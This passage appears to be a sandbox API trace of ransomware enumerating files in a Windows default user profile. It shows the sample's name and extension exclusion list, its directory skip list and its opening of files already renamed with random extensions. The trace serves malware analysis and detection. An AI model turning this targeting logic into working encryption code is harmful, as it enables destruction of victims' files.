lpFindFileData=0x36ff784*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="DECRYPT-FILES.txt") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="autorun.inf") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="boot.ini") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="desktop.ini") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0186.681] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xc103692e, ftCreationTime.dwHighDateTime=0x1ca0451, ftLastAccessTime.dwLowDateTime=0x1dd1880d, ftLastAccessTime.dwHighDateTime=0x1cbf8ec, ftLastWriteTime.dwLowDateTime=0x1dd1880d, ftLastWriteTime.dwHighDateTime=0x1cbf8ec, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="DECRYPT-FILES.txt") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="autorun.inf") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="boot.ini") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="desktop.ini") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="ntuser.dat") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="iconcache.db") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="bootsect.bak") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="ntuser.dat.log") returned 0 [0186.681] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xb0eb7ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2e508, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1.sVG4Jj", cAlternateFileName="NTUSER~1.SVG")) returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG1.sVG4Jj", lpString2="DECRYPT-FILES.txt") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG1.sVG4Jj", lpString2="autorun.inf") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG1.sVG4Jj", lpString2="boot.ini") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG1.sVG4Jj", lpString2="desktop.ini") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG1.sVG4Jj", lpString2="ntuser.dat") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG1.sVG4Jj", lpString2="iconcache.db") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG1.sVG4Jj", lpString2="bootsect.bak") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG1.sVG4Jj", lpString2="ntuser.dat.log") returned 1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG1.sVG4Jj", lpString2="thumbs.db") returned -1 [0186.681] lstrcmpiW (lpString1="NTUSER.DAT.LOG1.sVG4Jj", lpString2="Bootfont.bin") returned 1 [0186.681] lstrlenW (lpString="NTUSER.DAT.LOG1.sVG4Jj") returned 22 [0186.681] lstrcmpiW (lpString1="sVG4Jj", lpString2="lnk") returned 1 [0186.681] lstrcmpiW (lpString1="sVG4Jj", lpString2="exe") returned 1 [0186.681] lstrcmpiW (lpString1="sVG4Jj", lpString2="sys") returned -1 [0186.681] lstrcmpiW (lpString1="sVG4Jj", lpString2="dll") returned 1 [0186.681] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0186.681] lstrlenW (lpString="NTUSER.DAT.LOG1.sVG4Jj") returned 22 [0186.681] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0186.681] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT.LOG1.sVG4Jj" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG1.sVG4Jj") returned="C:\\Users\\Default\\NTUSER.DAT.LOG1.sVG4Jj" [0186.681] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.682] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1.sVG4Jj" (normalized: "c:\\users\\default\\ntuser.dat.log1.svg4jj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.682] CloseHandle (hObject=0x0) returned 0 [0186.682] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.682] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x9012aa61, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0186.682] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="DECRYPT-FILES.txt") returned 1 [0186.682] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="autorun.inf") returned 1 [0186.682] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="boot.ini") returned 1 [0186.682] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="desktop.ini") returned 1 [0186.682] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ntuser.dat") returned 1 [0186.682] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="iconcache.db") returned 1 [0186.682] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="bootsect.bak") returned 1 [0186.682] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ntuser.dat.log") returned 1 [0186.682] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="thumbs.db") returned -1 [0186.682] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="Bootfont.bin") returned 1 [0186.682] lstrlenW (lpString="NTUSER.DAT.LOG2") returned 15 [0186.682] lstrcmpiW (lpString1="LOG2", lpString2="lnk") returned 1 [0186.682] lstrcmpiW (lpString1="LOG2", lpString2="exe") returned 1 [0186.682] lstrcmpiW (lpString1="LOG2", lpString2="sys") returned -1 [0186.682] lstrcmpiW (lpString1="LOG2", lpString2="dll") returned 1 [0186.682] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0186.682] lstrlenW (lpString="NTUSER.DAT.LOG2") returned 15 [0186.682] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0186.682] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT.LOG2" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned="C:\\Users\\Default\\NTUSER.DAT.LOG2" [0186.683] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.683] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.683] CloseHandle (hObject=0x0) returned 0 [0186.683] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.683] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8d30919, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8d30919, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xb0eb7ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10108, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", cAlternateFileName="NTUSER~2.SVG")) returned 1 [0186.683] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", lpString2="DECRYPT-FILES.txt") returned 1 [0186.683] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", lpString2="autorun.inf") returned 1 [0186.683] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", lpString2="boot.ini") returned 1 [0186.683] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", lpString2="desktop.ini") returned 1 [0186.683] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", lpString2="ntuser.dat") returned 1 [0186.683] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", lpString2="iconcache.db") returned 1 [0186.683] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", lpString2="bootsect.bak") returned 1 [0186.683] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", lpString2="ntuser.dat.log") returned 1 [0186.683] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", lpString2="thumbs.db") returned -1 [0186.683] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj", lpString2="Bootfont.bin") returned 1 [0186.683] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj") returned 62 [0186.683] lstrcmpiW (lpString1="sVG4Jj", lpString2="lnk") returned 1 [0186.683] lstrcmpiW (lpString1="sVG4Jj", lpString2="exe") returned 1 [0186.683] lstrcmpiW (lpString1="sVG4Jj", lpString2="sys") returned -1 [0186.683] lstrcmpiW (lpString1="sVG4Jj", lpString2="dll") returned 1 [0186.683] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0186.684] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj") returned 62 [0186.684] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0186.684] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj") returned="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj" [0186.684] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.684] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.sVG4Jj" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.svg4jj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.684] CloseHandle (hObject=0x0) returned 0 [0186.684] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.684] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8da2d3a, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8da2d3a, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xb0f04160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x80108, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", cAlternateFileName="NTUSER~1.GUW")) returned 1 [0186.684] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", lpString2="DECRYPT-FILES.txt") returned 1 [0186.684] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", lpString2="autorun.inf") returned 1 [0186.684] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", lpString2="boot.ini") returned 1 [0186.684] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", lpString2="desktop.ini") returned 1 [0186.684] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", lpString2="ntuser.dat") returned 1 [0186.684] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", lpString2="iconcache.db") returned 1 [0186.684] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", lpString2="bootsect.bak") returned 1 [0186.684] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", lpString2="ntuser.dat.log") returned 1 [0186.684] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", lpString2="thumbs.db") returned -1 [0186.684] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f", lpString2="Bootfont.bin") returned 1 [0186.684] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f") returned 100 [0186.684] lstrcmpiW (lpString1="guWw07f", lpString2="lnk") returned -1 [0186.684] lstrcmpiW (lpString1="guWw07f", lpString2="exe") returned 1 [0186.685] lstrcmpiW (lpString1="guWw07f", lpString2="sys") returned -1 [0186.685] lstrcmpiW (lpString1="guWw07f", lpString2="dll") returned 1 [0186.685] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0186.685] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f") returned 100 [0186.685] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0186.685] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f") returned="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f" [0186.685] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.685] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.guww07f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.685] CloseHandle (hObject=0x0) returned 0 [0186.685] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.685] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8deeffb, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8deeffb, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x80108, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", cAlternateFileName="NTUSER~1.FWC")) returned 1 [0186.685] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", lpString2="DECRYPT-FILES.txt") returned 1 [0186.685] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", lpString2="autorun.inf") returned 1 [0186.685] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", lpString2="boot.ini") returned 1 [0186.685] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", lpString2="desktop.ini") returned 1 [0186.685] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", lpString2="ntuser.dat") returned 1 [0186.685] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", lpString2="iconcache.db") returned 1 [0186.685] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", lpString2="bootsect.bak") returned 1 [0186.685] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", lpString2="ntuser.dat.log") returned 1 [0186.685] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", lpString2="thumbs.db") returned -1 [0186.685] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY", lpString2="Bootfont.bin") returned 1 [0186.685] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY") returned 97 [0186.686] lstrcmpiW (lpString1="FwcY", lpString2="lnk") returned -1 [0186.686] lstrcmpiW (lpString1="FwcY", lpString2="exe") returned 1 [0186.686] lstrcmpiW (lpString1="FwcY", lpString2="sys") returned -1 [0186.686] lstrcmpiW (lpString1="FwcY", lpString2="dll") returned 1 [0186.686] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0186.686] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY") returned 97 [0186.686] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0186.686] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY") returned="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY" [0186.686] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.686] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.fwcy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.686] CloseHandle (hObject=0x0) returned 0 [0186.686] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.686] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini.FwcY", cAlternateFileName="NTUSER~2.FWC")) returned 1 [0186.686] lstrcmpiW (lpString1="ntuser.ini.FwcY", lpString2="DECRYPT-FILES.txt") returned 1 [0186.686] lstrcmpiW (lpString1="ntuser.ini.FwcY", lpString2="autorun.inf") returned 1 [0186.686] lstrcmpiW (lpString1="ntuser.ini.FwcY", lpString2="boot.ini") returned 1 [0186.686] lstrcmpiW (lpString1="ntuser.ini.FwcY", lpString2="desktop.ini") returned 1 [0186.686] lstrcmpiW (lpString1="ntuser.ini.FwcY", lpString2="ntuser.dat") returned 1 [0186.686] lstrcmpiW (lpString1="ntuser.ini.FwcY", lpString2="iconcache.db") returned 1 [0186.686] lstrcmpiW (lpString1="ntuser.ini.FwcY", lpString2="bootsect.bak") returned 1 [0186.686] lstrcmpiW (lpString1="ntuser.ini.FwcY", lpString2="ntuser.dat.log") returned 1 [0186.687] lstrcmpiW (lpString1="ntuser.ini.FwcY", lpString2="thumbs.db") returned -1 [0186.687] lstrcmpiW (lpString1="ntuser.ini.FwcY", lpString2="Bootfont.bin") returned 1 [0186.687] lstrlenW (lpString="ntuser.ini.FwcY") returned 15 [0186.687] lstrcmpiW (lpString1="FwcY", lpString2="lnk") returned -1 [0186.687] lstrcmpiW (lpString1="FwcY", lpString2="exe") returned 1 [0186.687] lstrcmpiW (lpString1="FwcY", lpString2="sys") returned -1 [0186.687] lstrcmpiW (lpString1="FwcY", lpString2="dll") returned 1 [0186.687] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0186.687] lstrlenW (lpString="ntuser.ini.FwcY") returned 15 [0186.687] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0186.687] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="ntuser.ini.FwcY" | out: lpString1="C:\\Users\\Default\\ntuser.ini.FwcY") returned="C:\\Users\\Default\\ntuser.ini.FwcY" [0186.687] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.687] CreateFileW (lpFileName="C:\\Users\\Default\\ntuser.ini.FwcY" (normalized: "c:\\users\\default\\ntuser.ini.fwcy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.687] CloseHandle (hObject=0x0) returned 0 [0186.687] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.687] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0186.687] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0186.687] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0186.687] lstrcatW (in: lpString1="Pictures", lpString2="\\" | out: lpString1="Pictures\\") returned="Pictures\\" [0186.687] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Pictures\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\" [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="\\Program Files") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch=":\\Windows") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="\\Games\\") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="\\All Users") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", 